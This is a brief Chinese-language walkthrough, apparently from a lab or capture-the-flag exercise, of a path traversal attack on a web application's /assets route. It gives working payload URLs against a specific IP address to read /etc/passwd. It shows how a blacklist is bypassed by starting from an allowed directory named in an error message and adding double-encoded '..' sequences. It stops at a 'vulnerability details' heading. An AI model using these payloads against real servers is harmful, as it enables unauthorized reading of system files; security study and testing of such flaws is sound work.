构造payload,读取/etc/passwd文件;
http://219.153.49.228:46944/assets/file:%2f%2f/etc/passwd
passwd在黑名单中,不被允许访问,但是报错信息中给出了允许访问的目录,通过使用允许访问的目录可以跳转到/etc/passwd;
payload如下:http://219.153.49.228:46944/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
漏洞详情: